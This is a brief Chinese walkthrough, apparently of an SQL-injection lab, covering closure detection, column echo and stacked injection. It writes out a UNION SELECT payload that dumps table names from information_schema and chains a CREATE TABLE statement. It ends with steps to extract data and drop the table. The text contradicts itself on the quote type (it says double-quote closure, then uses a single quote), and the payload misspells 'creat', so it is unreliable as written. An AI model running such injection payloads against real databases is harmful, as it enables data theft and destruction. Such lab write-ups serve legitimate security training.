打开网页首先判断闭合类型
说明为双引号闭合
我们可以使用单引号将其报错
先尝试判断回显位
可以看见输出回显位为2,3
尝试暴库爆表
这时候进行尝试堆叠注入,创造一张新表
?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();creat table usdt like users --+
从新表爆字段
爆数据,顺便删表